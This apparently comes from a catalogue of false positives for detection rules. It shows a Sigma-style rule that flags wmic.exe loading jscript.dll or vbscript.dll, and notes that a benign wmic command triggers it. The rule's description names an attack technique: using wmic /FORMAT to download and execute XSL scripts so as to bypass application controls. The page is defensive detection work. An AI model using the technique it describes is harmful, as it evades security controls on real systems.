LoFP LoFP / the command wmic os get lastboottuptime loads vbscript.dll

Techniques

Sample rules

WMIC Loading Scripting Libraries

Description

Detects threat actors proxy executing code and bypassing application controls by leveraging wmic and the /FORMAT argument switch to download and execute an XSL file (i.e js, vbs, etc).

Detection logic

condition: selection
selection:
  ImageLoaded|endswith:
  - \jscript.dll
  - \vbscript.dll
  Image|endswith: \wmic.exe